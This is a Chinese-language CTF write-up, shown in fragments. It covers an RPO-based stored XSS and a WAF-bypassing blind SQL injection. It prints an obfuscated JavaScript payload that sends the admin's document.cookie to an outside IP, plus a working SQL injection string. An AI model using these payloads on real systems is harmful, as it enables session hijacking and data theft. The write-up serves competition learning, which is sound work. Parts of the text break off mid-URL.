签到

复制黏贴flag

web

web签到

过第一个的payload
图片1

过第二个的payload
就是直接从网上找md5完全相等的碰撞。
图片2

Share your mind

本来以为是ssrf,但是经过多次尝试都没有任何突破
后来在群里看到管理员发了这个截图
![图片3]
图片标题
再结合
![图片4]
图片标题
这个页面submmit之后提示 管理员会很快审核这个东西,这感觉很明显就是要我们打管理员cookie啊,于是就想着去找xss,找了半天没找到,于是上网找了很多资料,最后从这篇文章http://www.qingpingshan.com/pc/aq/240597.html里面得到了灵感,感觉跟rpo技术有关,于是看了相关的资料。
并且最后发现在write article中配合rpo可以构造出xss
如下
![图片5]
图片标题
这个存在之后可以看到id为666
![图片6]
图片标题
配合rpo技术 访问这个链接就能触发xss
http://39.107.33.96:20000/index.php/view/article/666/%2f..%2f..%2f..%2f..%2f
![图片7]
图片标题

下面就很常规套路了,打cookie
在写文章的地方写上打cookie代码

  1. function poc() { var img_2 = document.createElement(String.fromCharCode(105, 109, 103)); img_2.src = String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 49, 49, 57, 46, 50, 57, 46, 49, 57, 49, 46, 50, 48, 48, 47,63, 99, 111, 111, 107, 105, 101, 61)+ escape(document.cookie); } setTimeout(poc, 2000);

然后在reports处提交这个url给管理员审核
http://39.107.33.96:20000/index.php/view/arti

主要代码

图片标题
就是一个绕waf的sql注入
简单的测试waf过滤了=,like,where,pw),2,3,4,5,9
2可以用1+1代替,如此类推,pw)只要在中间加空格就可绕过

最终payload

flag=0&hi=%2B(conv(hex((select substr((select pw ),1%2B1,1))),16,10))